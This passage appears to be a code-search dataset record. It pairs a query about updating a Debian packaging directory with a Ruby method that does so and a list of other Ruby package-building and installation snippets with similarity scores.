File.join(gem_pkg_dir, File.basename(subgem_pkg))\n FileUtils.copy_entry(subgem_pkg, dest, true, false, true) \n end\n\n # Finally generate the main package and install it; subgems\n # (dependencies) are local to the main package.\n FileUtils.cd(gem_src_dir) do\n system(\"#{rake} package\")\n FileUtils.cd(gem_pkg_dir) do\n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n # If the (meta) gem has it's own package, install it.\n install_gem(File.basename(package), options.dup)\n else\n # Otherwise install each package seperately.\n Dir[\"*.gem\"].each { |gem| install_gem(gem, options.dup) }\n end\n end\n return true\n end\n end\n end\n raise Gem::InstallError, \"No Rakefile found for #{gem_name}\"\n end",
"def tailor_package_to_platform\n @package.app('Dropbox')\n @package.volumes_dir('Dropbox Installer')\n @package.source(URI.encode(\"file://#{download_dest}\"))\n end",
"def package_common(package_type, spec, &block)\n package_name = Autoproj.package_name_from_options(spec)\n\n if Autobuild::Package[package_name]\n current_file = Autoproj.current_file[1]\n old_file = Autoproj.workspace.manifest.definition_file(package_name)\n Autoproj.warn \"#{package_name} from #{current_file} is overridden by the definition in #{old_file}\"\n\n return Autobuild::Package[package_name]\n end\n\n pkg = Autoproj.define(package_type, spec, &block)\n pkg.srcdir = pkg.name\n pkg\nend",
"def package_dir\n config.package_dir\n end",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end",
"def manual_package_install(pkg_dependencies=[])\n\n unless pkg_dependencies.nil?\n pkg_dependencies.each do |pkg|\n\n if pkg =~ /\\.rpm/\n filename = $1 if pkg =~ /\\/(\\w+[a-zA-Z0-9\\-\\_\\.]+\\.rpm)\\z/\n p \"FILENAME: #{filename}\"\n remote_file \"#{Chef::Config[:file_cache_path]}/#{filename}\" do\n source \"#{pkg}\"\n action :create_if_missing\n end\n end\n\n package pkg do\n action :install\n if pkg =~ /\\.rpm/\n source \"#{Chef::Config[:file_cache_path]}/#{filename}\"\n provider Chef::Provider::Package::Rpm\n end\n end\n\n end\n end\n\nend",
"def add_bundle(sourcefile, params={})\n classname = File.basename(sourcefile, \".java\")\n pkgline = `grep ^package #{sourcefile}`\n if !pkgline or pkgline == \"\"\n raise \"the searcher file (#{sourcefile}) must contain a package declaration\"\n end\n pkgpath = pkgline.split()[1].chop;\n add_bundle_dir(sourcefile, pkgpath + \".\" + classname, params)\n end",
"def define\n fail \"Version required (or :noversion)\" if @version.nil?\n @version = nil if :noversion == @version\n\n desc \"Build all the packages\"\n task :package\n\n desc \"Force a rebuild of the package files\"\n task repackage: [:clobber_package, :package]\n\n desc \"Remove package products\"\n task :clobber_package do\n rm_r package_dir rescue nil\n end\n\n task clobber: [:clobber_package]\n\n [\n [need_tar, tgz_file, \"z\"],\n [need_tar_gz, tar_gz_file, \"z\"],\n [need_tar_bz2, tar_bz2_file, \"j\"],\n [need_tar_xz, tar_xz_file, \"J\"]\n ].each do |need, file, flag|\n if need\n task package: [\"#{package_dir}/#{file}\"]\n file \"#{package_dir}/#{file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @tar_command, \"#{flag}cvf\", file, target_dir }\n mv \"#{package_dir_path}/#{target_dir}\", package_dir if without_parent_dir\n end\n end\n end\n\n if need_zip\n task package: [\"#{package_dir}/#{zip_file}\"]\n file \"#{package_dir}/#{zip_file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @zip_command, \"-r\", zip_file, target_dir }\n mv \"#{package_dir_path}/#{zip_file}\", package_dir if without_parent_dir\n end\n end\n\n directory package_dir_path => @package_files do\n @package_files.each do |fn|\n f = File.join(package_dir_path, fn)\n fdir = File.dirname(f)\n mkdir_p(fdir) unless File.exist?(fdir)\n if File.directory?(fn)\n mkdir_p(f)\n else\n rm_f f\n safe_ln(fn, f)\n end\n end\n end\n self\n end",
"def target_dir\n without_parent_dir ? \".\" : package_name\n end",
"def install_package host, package_name\n host.install_package package_name\n end",
"def output_package(pkg_type)\n case pkg_type\n when 'makeself'\n \"#{package_name}-#{build_version}_#{iteration}.sh\"\n when 'msi'\n Packager::WindowsMsi.new(self).package_name\n when 'bff'\n \"#{package_name}.#{bff_version}.bff\"\n when 'pkgmk'\n \"#{package_name}-#{build_version}-#{iteration}.solaris\"\n when 'mac_pkg'\n Packager::MacPkg.new(self).package_name\n when 'mac_dmg'\n pkg = Packager::MacPkg.new(self)\n Packager::MacDmg.new(pkg).package_name\n else # fpm\n require \"fpm/package/#{pkg_type}\"\n pkg = FPM::Package.types[pkg_type].new\n pkg.version = build_version\n pkg.name = package_name\n pkg.iteration = iteration\n if pkg_type == 'solaris'\n pkg.to_s('NAME.FULLVERSION.ARCH.TYPE')\n else\n pkg.to_s\n end\n end\n end",
"def metapackage(name, *packages, &block)\n meta = (@metapackages[name.to_s] ||= Metapackage.new(name))\n packages.each do |arg|\n if !arg.respond_to?(:to_str)\n meta.add(arg)\n elsif (pkg = find_autobuild_package(arg))\n meta.add(pkg)\n elsif (pkg_set = find_metapackage(arg))\n pkg_set.each_package do |pkg_in_set|\n meta.add(pkg_in_set)\n end\n elsif os_package_resolver.has?(arg)\n raise ArgumentError, \"cannot specify the osdep #{arg} as an element of a metapackage\"\n else\n raise PackageNotFound, \"cannot find a package called #{arg}\"\n end\n end\n\n meta.instance_eval(&block) if block\n meta\n end",
"def install_gem_from_source(source_dir, *args)\n installed_gems = []\n opts = args.last.is_a?(Hash) ? args.pop : {}\n Dir.chdir(source_dir) do \n gem_name = args[0] || File.basename(source_dir)\n gem_pkg_dir = File.join(source_dir, 'pkg')\n gem_pkg_glob = File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")\n skip_gems = opts.delete(:skip) || []\n\n # Cleanup what's already there\n clobber(source_dir)\n FileUtils.mkdir_p(gem_pkg_dir) unless File.directory?(gem_pkg_dir)\n\n # Recursively process all gem packages within the source dir\n skip_gems << gem_name\n packages = package_all(source_dir, skip_gems)\n \n if packages.length == 1\n # The are no subpackages for the main package\n refresh = [gem_name]\n else\n # Gather all packages into the top-level pkg directory\n packages.each do |pkg|\n FileUtils.copy_entry(pkg, File.join(gem_pkg_dir, File.basename(pkg)))\n end\n \n # Finally package the main gem - without clobbering the already copied pkgs\n package(source_dir, false)\n \n # Gather subgems to refresh during installation of the main gem\n refresh = packages.map do |pkg|\n File.basename(pkg, '.gem')[/^(.*?)-([\\d\\.]+)$/, 1] rescue nil\n end.compact\n \n # Install subgems explicitly even if ignore_dependencies is set\n if opts[:ignore_dependencies]\n refresh.each do |name| \n gem_pkg = Dir[File.join(gem_pkg_dir, \"#{name}-*.gem\")][0]\n install_pkg(gem_pkg, opts)\n end\n end\n end\n \n ensure_bin_wrapper_for(opts[:install_dir], opts[:bin_dir], *installed_gems)\n \n # Finally install the main gem\n if install_pkg(Dir[gem_pkg_glob][0], opts.merge(:refresh => refresh))\n installed_gems = refresh\n else\n installed_gems = []\n end\n end\n installed_gems\n end",
"def install_gem_from_src(gem_src_dir, options = {})\n if !File.directory?(gem_src_dir)\n raise \"Missing rubygem source path: #{gem_src_dir}\"\n end\n if options[:install_dir] && !File.directory?(options[:install_dir])\n raise \"Missing rubygems path: #{options[:install_dir]}\"\n end\n\n gem_name = File.basename(gem_src_dir)\n gem_pkg_dir = File.expand_path(File.join(gem_src_dir, 'pkg'))\n\n # We need to use local bin executables if available.\n thor = \"#{Gem.ruby} -S #{which('thor')}\"\n rake = \"#{Gem.ruby} -S #{which('rake')}\"\n\n # Handle pure Thor installation instead of Rake\n if File.exists?(File.join(gem_src_dir, 'Thorfile'))\n # Remove any existing packages.\n FileUtils.rm_rf(gem_pkg_dir) if File.directory?(gem_pkg_dir)\n # Create the package.\n FileUtils.cd(gem_src_dir) { system(\"#{thor} :package\") }\n # Install the package using rubygems.\n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n FileUtils.cd(File.dirname(package)) do\n install_gem(File.basename(package), options.dup)\n return true\n end\n else\n raise Gem::InstallError, \"No package found for #{gem_name}\"\n end\n # Handle elaborate installation through Rake\n else\n # Clean and regenerate any subgems for meta gems.\n Dir[File.join(gem_src_dir, '*', 'Rakefile')].each do |rakefile|\n FileUtils.cd(File.dirname(rakefile)) do \n system(\"#{rake} clobber_package; #{rake} package\")\n end\n end\n\n # Handle the main gem install.\n if File.exists?(File.join(gem_src_dir, 'Rakefile'))\n subgems = []\n # Remove any existing packages.\n FileUtils.cd(gem_src_dir) { system(\"#{rake} clobber_package\") }\n # Create the main gem pkg dir if it doesn't exist.\n FileUtils.mkdir_p(gem_pkg_dir) unless File.directory?(gem_pkg_dir)\n # Copy any subgems to the main gem pkg dir.\n Dir[File.join(gem_src_dir, '*', 'pkg', '*.gem')].each do |subgem_pkg|\n if name = File.basename(subgem_pkg, '.gem')[/^(.*?)-([\\d\\.]+)$/, 1]\n subgems << name\n end\n dest = File.join(gem_pkg_dir, File.basename(subgem_pkg))\n FileUtils.copy_entry(subgem_pkg, dest, true, false, true) \n end\n\n # Finally generate the main package and install it; subgems\n # (dependencies) are local to the main package.\n FileUtils.cd(gem_src_dir) do \n system(\"#{rake} package\")\n FileUtils.cd(gem_pkg_dir) do\n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n # If the (meta) gem has it's own package, install it.\n install_gem(File.basename(package), options.merge(:refresh => subgems))\n else\n # Otherwise install each package seperately.\n Dir[\"*.gem\"].each { |gem| install_gem(gem, options.dup) }\n end\n end\n return true\n end\n end\n end\n raise Gem::InstallError, \"No Rakefile found for #{gem_name}\"\n end",
"def source_package_file\n pkg_file = nil\n pkg_dir = self.source_package_dir\n @source_urls.each do |url|\n poss_pkg_file = File.join(pkg_dir, File.basename(url[0]))\n if File::exists?(poss_pkg_file)\n pkg_file = poss_pkg_file\n break\n end\n end\n pkg_file\n end",
"def source_package_file\n pkg_file = nil\n pkg_dir = self.source_package_dir\n @source_urls.each do |url|\n poss_pkg_file = File.join(pkg_dir, File.basename(url[0]))\n if File::exists?(poss_pkg_file)\n pkg_file = poss_pkg_file\n break\n end\n end\n pkg_file\n end",
"def before_package_create(package)\n end",
"def before_package_create(package)\n end",
"def package(cookbook, destination)\n cookbooks[cookbook] ||= {}\n cookbooks[cookbook][:destination] = destination\n end",
"def gemfile spec, source, destination = nil\n destination ||= File.expand_path \".\"\n\n require \"rubygems/builder\"\n\n Dir.chdir source do\n FileUtils.mv Gem::Builder.new(spec).build, destination\n end\n\n destination\n end",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def create_packages\n gem 'fpm', '= 0.4.3'\n require 'fpm'\n\n @package.packagedata.each do |type, data|\n next unless data\n @tmpdir = Dir.mktmpdir(\"mcollective_packager\")\n @workingdir = File.join(@tmpdir, @libdir)\n FileUtils.mkdir_p @workingdir\n prepare_tmpdirs data\n create_package type, data\n cleanup_tmpdirs\n end\n end",
"def package(destination)\n output[:messages] << \"Cookbook(s) packaged to #{destination}\"\n end",
"def do_dmg_package_resource!\n dmg_package 'Chef Development Kit' do\n app dmg_package_app\n volumes_dir 'Chef Development Kit'\n source dmg_package_source\n type 'pkg'\n package_id 'com.getchef.pkg.chefdk'\n checksum dmg_package_checksum\n end\n end",
"def add_packaged_app(&block)\n raise Tay::InvalidSpecification.new('Packaged app already set up') if @packaged_app\n @packaged_app = PackagedApp.new\n yield @packaged_app\n end",
"def package(*patterns)\n install_package_matching patterns\n end",
"def initialize(namespace, name, source, options={})\n raise \"Package source root '#{source}' is not a directory\" unless File.directory? source\n\n @namespace = namespace.to_s.freeze\n @name = name.to_s.freeze\n @source = Pathname.new(source).freeze\n @dest = Pathname.new(options[:into] || \"\").freeze\n @active = !!(options[:default] || options[:when])\n\n # Special case user@host packages.\n if name =~ /([^@]*)@(.*)/\n hostname = %x{hostname}.chomp\n hostnames = [hostname, hostname.split('.').first]\n user_match = $1.empty? || (ENV['USER'] == $1)\n host_match = $2.empty? || (hostnames.include? $2)\n @active = true if user_match && host_match\n end\n\n @links = { }\n populate_links do |path|\n if options[:dotfiles] == true\n \".#{path.basename}\" if path.parent == @source\n elsif options[:dotfiles].kind_of? Array\n relpath = path.relative_path_from(@source)\n \".#{path.basename}\" if options[:dotfiles].include? relpath.to_s\n end\n end\n @links.freeze\n end",
"def packages\n manifest.each_with_object({}) do |(src, package_name), hsh|\n next if src.nil? || src.empty?\n hsh[package_name] ||= []\n hsh[package_name] << File.join(Licensed::Git.repository_root, src)\n end\n end",
"def install_go_source\n source = \"go#{GO_VERSION}.src.tar.gz\"\n bootstrap = \"go1.4-bootstrap-20161024.tar.gz\"\n\n <<-SCRIPT\n mkdir -p /usr/local/go/bootstrap\n #{wget(bootstrap)}\n tar -C /usr/local/go/bootstrap -xzf #{bootstrap}\n bash -c \"cd /usr/local/go/bootstrap/go/src && ./make.bash\"\n\n #{wget(source)}\n tar -C /usr/local -xzf #{source}\n bash -c \"cd /usr/local/go/src && GOROOT_BOOTSTRAP=/usr/local/go/bootstrap/go ./make.bash\"\n SCRIPT\nend",
"def to_package\n package = Package.new(root)\n package.name = name\n package.version = version\n package.date = released\n package.path = loadpath\n package\n end",
"def dmg_package_source\n if %i(direct repo).include?(new_resource.source)\n return package_metadata[:url]\n end\n path = new_resource.source.to_s\n (path.start_with?('/') ? 'file://' : '') + path\n end",
"def create_arch_package(arch, arch_dir, src_dir, out_dir, pack_config)\n # Load manifest\n manifest = YAML.load_file(\"#{src_dir}/manifest.yaml\")\n manifest['arch'] = arch\n name = manifest['name']\n version = manifest['version']\n info \"Packing #{src_dir} (#{arch})\"\n\n npk = \"#{out_dir}/#{name}-#{arch}-#{version}.npk\"\n\n # TODO: do this seperatly\n # Remove existing containers\n Dir.glob(\"#{out_dir}/#{name}-#{arch}-*\").each { |c| FileUtils.rm(c, :verbose => false) }\n\n create_npk(src_dir, npk, manifest, arch_dir, pack_config)\n\n # Update/Create version list\n version_info_path = File.join(out_dir, \"packages-#{arch}.yaml\")\n update_version_list(version_info_path, name, version)\nend",
"def autotools_package(options, &block)\n package_common(:autotools, options) do |pkg|\n pkg.depends_on 'autotools'\n common_make_based_package_setup(pkg)\n yield(pkg) if block_given?\n end\nend",
"def install_custom!\n do_dmg_package_resource!\n end",
"def package(name, paths=[])\n Package.new(name, paths, self)\n end",
"def install_package(package_name, options = {})\n return true if install_package_impl(package_name, options)\n if options[:source]\n if options[:no_proxy]\n install_package package_name, options.merge(:source => false)\n else\n install_package package_name, options.merge(:no_proxy => true)\n end\n else\n return false unless options[:no_proxy]\n install_package package_name, options.merge(:no_proxy => true)\n end\n end",
"def package(pkg)\n @pkg = pkg\n end",
"def for_package(package)\n data = File.read(path_for(package))\n hash = FFI_Yajl::Parser.parse(data, symbolize_names: true)\n\n # Ensure Platform version has been truncated\n if hash[:platform_version] && hash[:platform]\n hash[:platform_version] = truncate_platform_version(hash[:platform_version], hash[:platform])\n end\n\n # Ensure an interation exists\n hash[:iteration] ||= 1\n\n new(package, hash)\n rescue Errno::ENOENT\n raise NoPackageMetadataFile.new(package.path)\n end",
"def initialize_package\n self.need_tar ||= false\n self.need_zip ||= false\n end"
] | [
"0.68598044",
"0.68513906",
"0.6561744",
"0.632393",
"0.624938",
"0.62227345",
"0.62220913",
"0.6191581",
"0.619106",
"0.61131114",
"0.6092626",
"0.60886014",
"0.6073014",
"0.60682124",
"0.602863",
"0.59846896",
"0.59642756",
"0.5947927",
"0.5936238",
"0.5925864",
"0.5917892",
"0.59172887",
"0.5885911",
"0.58814466",
"0.5873726",
"0.5854692",
"0.5843708",
"0.5841641",
"0.5814937",
"0.5802581",
"0.5800184",
"0.5793957",
"0.57910943",
"0.5789499",
"0.5774517",
"0.5774465",
"0.57543594",
"0.57416844",
"0.5738592",
"0.5734952",
"0.5706435",
"0.56966525",
"0.5672639",
"0.56600314",
"0.5650032",
"0.5648602",
"0.5648259",
"0.56444687",
"0.5637078",
"0.56324506",
"0.5626878",
"0.5614026",
"0.56119144",
"0.5606124",
"0.5605738",
"0.5598999",
"0.5589824",
"0.5577887",
"0.55711734",
"0.55428034",
"0.55377036",
"0.5530041",
"0.5528025",
"0.55213666",
"0.551394",
"0.55124646",
"0.55105585",
"0.55075145",
"0.55051285",
"0.5503124",
"0.5499832",
"0.54988843",
"0.5496894",
"0.54899454",
"0.5486019",
"0.54836154",
"0.54836154",
"0.54758364",
"0.54758364",
"0.5472895",
"0.5470351",
"0.5462277",
"0.5458934",
"0.5458794",
"0.5441396",
"0.5439586",
"0.543306",
"0.543116",
"0.5421197",
"0.54093045",
"0.54029185",
"0.54017526",
"0.53969795",
"0.5390784",
"0.5385779",
"0.5379177",
"0.53791046",
"0.5374919",
"0.5371284",
"0.5368517"
] | 0.561658 | 51 |
Update the debian directory with overlay and env.sh/env.yml | def update_debian_dir(pkginfo, options)
# Generate the debian directory
generate_debian_dir(pkginfo, pkginfo.srcdir, options)
if options[:patch_dir] && File.exist?(options[:patch_dir])
if patch_pkg_dir(pkginfo.name, options[:patch_dir],
whitelist: nil,
pkg_dir: pkginfo.srcdir,
options: patch_options())
Packager.warn "Overlay patch applied to #{pkginfo.name}"
end
Dir.chdir(pkginfo.srcdir) do
process_apaka_control("apaka.control")
end
end
dpkg_commit_changes("overlay", pkginfo.srcdir,
logfile: options[:logfile],
include_removal: true)
envyml = File.join(pkginfo.srcdir, "env.yml")
Packager.warn("Preparing env.yml #{envyml}")
patch_yml = {}
if File.exists?(envyml)
patch_yml = YAML.load_file(envyml)
end
env_data = pkginfo.generate_env_data("APAKA__" + Packaging.as_var_name(pkginfo.name), rock_install_directory, base_data: patch_yml)
File.open(envyml, "w") do |file|
file.write(env_data.to_yaml)
end
dpkg_commit_changes("envyml", pkginfo.srcdir,
logfile: options[:logfile])
envsh = File.join(pkginfo.srcdir, "env.sh")
Packager.warn("Preparing env.sh #{envsh}")
File.open(envsh, "a") do |file|
env_txt = pkginfo.envsh(env_data)
file.write(env_txt)
end
dpkg_commit_changes("envsh", pkginfo.srcdir,
logfile: options[:logfile])
# Run dpkg-source
# Use the new tar ball as source
if !system("dpkg-source", "-I", "-b", pkginfo.srcdir,
[:out, :err] => redirection(options[:logfile],"a"),
:close_others => true)
Packager.warn "Package: #{pkginfo.name} failed to perform dpkg-source -- #{Dir.entries(pkginfo.srcdir)}"
raise RuntimeError, "Debian: #{pkginfo.name} failed to perform dpkg-source in #{pkginfo.srcdir}"
end
["#{versioned_name(pkginfo, options[:distribution])}.debian.tar.gz",
"#{plain_versioned_name(pkginfo)}.orig.tar.gz",
"#{versioned_name(pkginfo, options[:distribution])}.dsc"]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def setup debian_repository\n write_config debian_repository\n restart\n end",
"def etc_update \n announcing 'Running etc-update' do\n system(\"chroot #{$chrootdir} /scripts/run.sh update_configs\")\n end\n send_to_state('build', 'etc_update')\n end",
"def apt_update(vm)\n vm.provision \"shell\", inline: <<-SHELL\n if [ ! -f /root/apt.updated ]; then\n apt-get -y update\n apt-get -y purge exim4-* libcairo*\n apt-get -y autoremove\n #apt-get -y upgrade\n #apt-get -y dist-upgrade\n apt-get -y install htop tree vim aufs-tools screen curl\n touch /root/apt.updated\n fi\n SHELL\nend",
"def install_in_debian\n package 'apt-transport-https'\n package 'dirmngr' if get_debian_os_name == 'stretch'\n collectd_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd']['uri']\n signalfx_collectd_plugin_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd_plugin']['uri']\n signalfx_keyid = node['SignalFx_debian_ppa']['keyid']\n execute 'add SignalFx PPA' do\n command \"apt-key adv --keyserver keyserver.ubuntu.com --recv-keys #{signalfx_keyid} && \n echo #{collectd_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd.list && \n echo #{signalfx_collectd_plugin_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd_plugin.list\"\n action :run\n end\n ubuntu_update\n install_package 'collectd'\nend",
"def update_env_file!\n present_env = ssh_read_file(app_username, \"#{ app_name }/.env\").to_s\n\n env = {\n \"RAILS_ENV\" => \"production\",\n \"PATH\" => \"/home/#{ app_username }/.rvm/wrappers/#{ app_name }:$PATH\",\n \"SECRET_KEY_BASE\" => SecureRandom.hex(64),\n }.merge(\n Dotenv::Parser.call(present_env)\n ).merge(\n options[:env] || {}\n ).map { |k, v|\n \"export #{ k }=#{ v.inspect }\\n\"\n }.join(\"\")\n\n ssh_write_file(app_username, \"#{ app_name }/.env\", env)\n end",
"def apt_update(vm)\n vm.provision \"shell\", inline: <<-SHELL\n if [ ! -f /root/apt.updated ]; then\n apt-get -y update\n apt-get -y purge exim4-*\n apt-get -y autoremove\n apt-get -y upgrade\n apt-get -y dist-upgrade\n apt-get -y install htop tree vim aufs-tools\n touch /root/apt.updated\n fi\n SHELL\nend",
"def update(args)\n if (args[0] == \"dns\")\n\n if RUBY_PLATFORM.include? \"linux\"\n system('ansible-playbook /usr/local/gdev-env/ansible/ubuntu.yml -i 127.0.0.1, --ask-become-pass --verbose --tags=dns')\n else\n system('ansible-playbook /usr/local/gdev-env/ansible/mac.yml -i 127.0.0.1, --ask-become-pass --verbose --tags=dns')\n end\n\n elsif (args[0].nil?)\n\n if RUBY_PLATFORM.include? \"linux\"\n system('cd /usr/local/gdev-env && git reset HEAD --hard && git pull origin HEAD && bin/ubuntu')\n else\n system('cd /usr/local/gdev-env && git reset HEAD --hard && git pull origin HEAD && bin/bootstrap')\n end\n # Rebuild and reload all services\n puts \"Refreshing all gdev services...\"\n service(['build nginx'])\n service(['reload'])\n\n else\n puts \"Did you mean to run: $ gdev update ?\"\n end\n end",
"def apt_update\n run %{apt-get update -y}\nend",
"def update(args)\n if (args[0] == \"dns\")\n system('ansible-playbook /usr/local/gdev-env/ansible/mac.yml -i 127.0.0.1, --ask-become-pass --verbose --tags=dns')\n elsif (args[0].nil?)\n system('cd /usr/local/gdev-env && git reset HEAD --hard && git pull origin HEAD && bin/bootstrap')\n # Rebuild and reload all services\n puts \"Refreshing all gdev services...\"\n service(['build nginx'])\n service(['reload'])\n else\n puts \"Did you mean to run: $ gdev update ?\"\n end\n end",
"def mirror_env_to_profile_d env_file\n if /opensuse|sles-/.match?(self[:platform])\n @logger.debug(\"mirroring environment to /etc/profile.d on opensuse/sles platform host\")\n cur_env = exec(Beaker::Command.new(\"cat #{env_file}\")).stdout\n shell_env = ''\n cur_env.each_line do |env_line|\n shell_env << \"export #{env_line}\"\n end\n # here doc it over\n exec(Beaker::Command.new(\"cat << EOF > #{self[:profile_d_env_file]}\\n#{shell_env}EOF\"))\n # set permissions\n exec(Beaker::Command.new(\"chmod +x #{self[:profile_d_env_file]}\"))\n # keep it current\n exec(Beaker::Command.new(\"source #{self[:profile_d_env_file]}\"))\n else\n # noop\n @logger.debug(\"will not mirror environment to /etc/profile.d on non-sles platform host\")\n end\n end",
"def setup_path\n # The Java Buildpack for WLS creates the complete domain structure and other linkages during staging.\n # The directory used for staging is at /tmp/staged/app\n # But the actual DEA execution occurs at /home/vcap/app. This discrepancy can result in broken paths and non-startup of the server.\n # So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution\n # Also, this script needs to be invoked before starting the server as it will create the links and also tweak the server args\n # (to listen on correct port, use user supplied jvm args)\n\n File.open(@application.root.to_s + '/' + SETUP_ENV_SCRIPT, 'w') do |f|\n\n f.puts '#!/bin/sh '\n f.puts '# There are 4 things handled by this script '\n f.puts ' '\n f.puts '# 1. Create links to mimic staging env and update scripts with jvm options '\n f.puts '# The Java Buildpack for WLS creates complete domain structure and other linkages during staging at '\n f.puts '# /tmp/staged/app location '\n f.puts '# But the actual DEA execution occurs at /home/vcap/app. '\n f.puts '# This discrepancy can result in broken paths and non-startup of the server. '\n f.puts '# So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution '\n f.puts '# Create paths that match the staging env, as otherwise scripts will break!! '\n f.puts ' '\n f.puts 'if [ ! -d \\\"/tmp/staged\\\" ]; then '\n f.puts ' /bin/mkdir /tmp/staged '\n f.puts 'fi; '\n f.puts 'if [ ! -d \\\"/tmp/staged/app\\\" ]; then '\n f.puts ' /bin/ln -s `pwd` /tmp/staged/app '\n f.puts 'fi; '\n f.puts ' '\n f.puts ' '\n end\n end",
"def update_apt_if_needed\n if self['platform'] =~ /debian|ubuntu|cumulus/\n if @apt_needs_update\n execute(\"apt-get update\")\n @apt_needs_update = false\n end\n end\n end",
"def upgrade_repo!\n package 'apt-transport-https'\n include_recipe \"apt-chef::#{new_resource.channel}\"\n package('chefdk') { action :upgrade }\n end",
"def update_apt_if_needed\n if self['platform'] =~ /debian|ubuntu|cumulus|huaweios/\n if @apt_needs_update\n execute(\"apt-get update\")\n @apt_needs_update = false\n end\n end\n end",
"def update_apt\n <<~APT\n # Update apt-get\n RUN DEBIAN_FRONTEND=noninteractive apt-get update\n APT\n end",
"def reload_systemd()\n bash 'reload systemd daemon' do\n user 'root'\n code 'systemctl daemon-reload'\n end\nend",
"def install_in_ubuntu\n install_ppa(node['SignalFx_ppa']['collectd']['name'],\n node['SignalFx_ppa']['collectd']['uri'])\n install_ppa(node['SignalFx_ppa']['collectd_plugin']['name'],\n node['SignalFx_ppa']['collectd_plugin']['uri'])\n ubuntu_update\n install_package 'collectd'\nend",
"def upgrade_direct!\n package \"Chef Development Kit v#{package_metadata[:version]}\" do\n source package_metadata[:url]\n checksum package_metadata[:sha256]\n end\n end",
"def apt_get_update hosts\n block_on hosts do |host|\n host.exec(Command.new(\"apt-get update\")) if /ubuntu|debian|cumulus/.match?(host[:platform])\n end\n end",
"def setup_before_restart\n tcs_static = node['thecollegesound']['static_root']\n tcs_app = File.join(node['thecollegesound']['app_root'], 'current')\n\n # -- Link statics (css, js, basic images)\n # FIXME: Consolidate the image directories\n ['css', 'js', 'images', 'icons', 'img'].each do |dir|\n link \"#{tcs_static}/static/#{dir}\" do\n to \"#{tcs_app}/collegesound/static/#{dir}\"\n end\n end\n\n # -- Link templates\n link \"#{tcs_static}/templates\" do\n to \"#{tcs_app}/collegesound/templates\"\n end\n\n # -- Install the package\n bash 'install_package' do\n user 'root'\n cwd tcs_app\n code 'python setup.py install'\n end\n\n # -- Run migration\n bash 'run_migration' do\n user 'root'\n cwd \"#{tcs_app}/collegesound\"\n code <<-EOH\n python manage.py convert_to_south main\n python manage.py migrate main\n EOH\n end\nend",
"def install_dev_repos_on(package, host, sha, repo_configs_dir, opts={})\n platform = host['platform'] =~ /^(debian|ubuntu)/ ? host['platform'].with_version_codename : host['platform']\n platform_configs_dir = File.join(repo_configs_dir, platform)\n\n case platform\n when /^(fedora|el|centos|sles)-(\\d+)-(.+)$/\n variant = (($1 == 'centos') ? 'el' : $1)\n fedora_prefix = ((variant == 'fedora') ? 'f' : '')\n version = $2\n arch = $3\n\n pattern = 'pl-%s-%s-%s-%s%s-%s.repo'\n\n repo_filename = pattern % [\n package,\n sha,\n variant,\n fedora_prefix,\n version,\n arch\n ]\n\n repo = fetch_http_file(\n \"%s/%s/%s/repo_configs/rpm/\" % [opts[:dev_builds_url],package, sha],\n repo_filename,\n platform_configs_dir\n )\n\n if /sles/i.match(platform)\n scp_to(host, repo, '/etc/zypp/repos.d/')\n else\n scp_to(host, repo, '/etc/yum.repos.d/')\n end\n\n when /^(debian|ubuntu)-([^-]+)-(.+)$/\n variant = $1\n version = $2\n arch = $3\n\n list = fetch_http_file(\n \"%s/%s/%s/repo_configs/deb/\" % [opts[:dev_builds_url],package, sha],\n \"pl-%s-%s-%s.list\" % [package, sha, version],\n platform_configs_dir\n )\n\n scp_to host, list, '/etc/apt/sources.list.d'\n if variant == 'ubuntu' && version.split('.').first.to_i >= 18\n apt_conf_content = 'Acquire::AllowInsecureRepositories \"true\";'\n else\n apt_conf_content = 'APT::Get::AllowUnauthenticated \"true\";'\n end\n create_remote_file(host, '/etc/apt/apt.conf.d/99trust-all', apt_conf_content)\n on host, 'apt-get update'\n else\n host.logger.notify(\"No repository installation step for #{platform} yet...\")\n end\n end",
"def generate_debian_dir(pkginfo, dir, options)\n options, unknown_options = Kernel.filter_options options,\n :distribution => nil,\n :override_existing => true,\n :patch_dir => nil\n\n distribution = options[:distribution]\n\n # Prepare fields for template\n package_info = pkginfo\n debian_name = debian_name(pkginfo)\n debian_version = debian_version(pkginfo, distribution)\n versioned_name = versioned_name(pkginfo, distribution)\n short_documentation = pkginfo.short_documentation\n documentation = pkginfo.documentation\n origin_information = pkginfo.origin_information\n source_files = pkginfo.source_files\n\n upstream_name = pkginfo.name\n copyright = pkginfo.copyright\n license = pkginfo.licenses\n\n deps = @dep_manager.filtered_dependencies(pkginfo)\n\n #debian names of rock packages\n deps_rock_packages = deps[:rock]\n deps_osdeps_packages = deps[:osdeps]\n deps_nonnative_packages = deps[:nonnative].to_a.flatten.compact\n\n dependencies = (deps_rock_packages + deps_osdeps_packages + deps_nonnative_packages).flatten\n build_dependencies = dependencies.dup\n\n this_rock_release = TargetPlatform.new(rock_release_name, target_platform.architecture)\n @rock_autobuild_deps[pkginfo.build_type].each do |pkginfo|\n name = debian_name(pkginfo)\n build_dependencies << this_rock_release.packageReleaseName(name)\n end\n\n # To handle 